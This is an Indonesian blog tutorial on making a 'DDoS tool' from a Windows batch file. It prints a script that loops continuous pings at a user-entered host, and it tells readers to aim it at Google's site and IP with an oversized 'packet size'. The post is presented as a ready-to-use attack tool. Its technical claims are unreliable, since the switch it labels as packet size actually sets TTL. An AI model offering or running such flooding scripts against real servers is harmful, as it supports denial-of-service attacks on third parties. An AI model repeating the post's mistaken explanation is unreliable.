Breaking News
Loading...

Membuat Tool DDoS Sederhana Dari Notepad

Kali ini saya akan memberikan sebuah tutor, yaitu membuat tools DDoS sederhana dari notepad. Jika kalian penasaran, mari kita simak berikut ini.
  • Buka Notepad dan masukan Code berikut :
@echo off
mode 67,16
title DDOS Attack
color 0a
cls
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS
  • Kemudian Save...
  • Beri nama Tools DDoS.bat - Ubah Save type: All Files - Save.
  • Buka file yang sudah dibuat tadi,  jika berhasil tampilannya akan seperti ini :
  • Masukan Web target di server-target : contoh => www.google.com lalu enter, dan masukan IP Host di IP Host : contoh => 173.194.38.178 lalu enter, selain itu masukan packet size di Packet Size : contoh =>99999999 dan enter
DOnE!

0 komentar:

Posting Komentar

 
Toggle Footer